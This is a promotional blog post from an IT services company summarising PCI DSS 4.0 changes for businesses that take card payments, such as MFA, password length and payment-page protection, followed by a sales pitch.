Many Stratix Systems clients accept credit and debit cards in their work, so we want to update you on the latest data security thinking for the Payment Card Industry.
The Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards designed to ensure the protection of credit and debit cardholder data. PCI DSS is maintained by the PCI Security Standards Council, which is made up of five major payment card brands, namely Visa, MasterCard, American Express, Discover, and JCB International. The latest version of the standard, PCI DSS 4.0, was released in November 2020.
Changes to PCI DSS – PCI DSS 4.0
PCI DSS 4.0 introduces several changes and updates to the existing requirements, with a particular focus on addressing evolving threats to payment card security. Here are some of the key changes that organizations should be aware of:
Increased focus on risk management
PCI DSS 4.0 places a greater emphasis on risk management, requiring organizations to implement more robust risk assessment processes. In the past, anywhere the standard said ‘periodic’ there was no real defined timeframe. Now the entity has to do a written ‘targeted risk assessment’ that defines each of these periods with justification for those time periods.
Enhanced requirements for authentication
PCI DSS 4.0 places a greater emphasis on the use of multi-factor authentication (MFA) to protect against credential theft and phishing attacks. MFA is now required for all personnel with non-console administrative access to the cardholder data environment. In some cases where prior a user could MFA into the environment and not have to use MFA again after that, a second MFA will be required to move into where the Card Holder Data (CHD) actually resides.
Expanded scope
Each entity must now do a documented annual scoping of their card holder environment.
Strengthened Web APP requirement
Payment pages on websites must be behind a WAF and have header mechanisms to alert to any changes to the payment page. Even if the payment page itself is being delivered by a third party.
Enhanced requirements
Manual log reviews are no longer allowed and an automated log review in real time must be performed. Internal Vulnerability Scans must be authenticated. Passwords now must be 12 characters instead of 7 unless MFA is used then they can be 8, also changing every 90 days is only required if MFA is not used, to name a few.
Greater transparency and flexibility
The new version of the standard includes more detailed and prescriptive guidance on how to meet the requirements, while also allowing for more flexibility in how organizations achieve compliance. This is intended to make compliance more achievable for organizations with limited resources or unique business models.
What does it mean for organizations that accept credit and debit cards in their work?
What all of that means is that PCI DSS 4.0 is a significant update to the existing standard that reflects the evolving threat landscape and changing payment ecosystem. Organizations that handle cardholder data must understand the new requirements and ensure that they follow the updated standard. While the standard becomes mandatory in April of 2024, many of the new requirements are best practice only until March of 2025. Failure to comply with PCI DSS 4.0 can result in significant fines and reputational damage, so it is critical that organizations take the necessary steps to protect cardholder data and maintain compliance with the latest version of the standard.
And this is where Stratix Systems can help.
Stratix Systems is one of the region’s leading technology solutions partners—with the people, resources and experience to deliver the Managed IT, cybersecurity, document management and imaging support you need: where, when and how you need it. The best practices, the most road-tested options, and the best technologies. Backed by knowledgeable people and the most responsive client and technical support in the business.
Stratix Systems offers clients a robust assortment of flexible, secure managed IT, cybersecurity, and document management solutions, as well as imaging and printing technologies to help protect you from hacks and attacks and support administrative workflows – all with significant cost savings that work with even the tightest of budgets. And of course, we provide knowledgeable tech support every step of the way.
So, if IT and cybersecurity issues are keeping you up at night, it’s time to talk with Stratix Systems. Call 800-444-2943 or visit stratixsystems.com to learn more about how we can help.